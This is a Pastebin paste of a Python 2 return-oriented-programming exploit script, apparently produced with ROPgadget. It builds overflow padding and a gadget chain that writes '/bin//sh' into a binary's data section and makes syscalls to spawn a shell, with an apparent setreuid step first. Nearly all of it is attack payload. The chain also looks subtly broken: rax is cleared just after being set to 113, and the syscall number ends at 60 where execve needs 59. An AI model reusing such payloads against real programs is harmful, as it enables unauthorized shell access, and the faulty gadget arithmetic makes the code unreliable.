API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 27th, 2017
51
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.01 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python2
  2. # execve generated by ROPgadget
  3.  
  4. from struct import pack
  5.  
  6. # Padding goes here
  7. p = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  8.  
  9. p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
  10. p += pack('<Q', 113)
  11. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  12. p += pack('<Q', 1234)
  13. p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
  14. p += pack('<Q', 1234)
  15. p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
  16. p += pack('<Q', 1234)
  17. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  18. p += pack('<Q', 0x0000000000400488) # syscall
  19.  
  20. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  21.  
  22. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  23. p += pack('<Q', 0x00000000006c0000) # @ .data
  24. p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
  25. p += '/bin//sh'
  26. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  27. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  28. p += pack('<Q', 0x00000000006c0008) # @ .data + 8
  29. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  30. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  31. p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
  32.  
  33. p += pack('<Q', 0x00000000006c0000) # @ .data
  34.  
  35. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  36. p += pack('<Q', 0x00000000006c0008) # @ .data + 8
  37.  
  38. p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
  39. p += pack('<Q', 0x00000000006c0008) # @ .data + 8
  40.  
  41.  
  42. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  43. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  44. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  45. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  46. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  47. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  48. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  49. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  50. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  51. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  52. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  53. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  54. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  55. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  56. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  57. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  58. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  59. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  60. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  61. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  62. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  63. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  64. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  65. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  66. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  67. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  68. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  69. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  70. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  71. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  72. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  73. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  74. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  75. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  76. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  77. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  78. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  79. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  80. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  81. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  82. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  83. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  84. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  85. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  86. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  87. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  88. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  89. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  90. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  91. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  92. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  93. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  94. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  95. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  96. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  97. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  98. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  99. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  100. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  101. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  102. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  103. p += pack('<Q', 0x0000000000400488) # syscall
  104.  
  105. print p
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!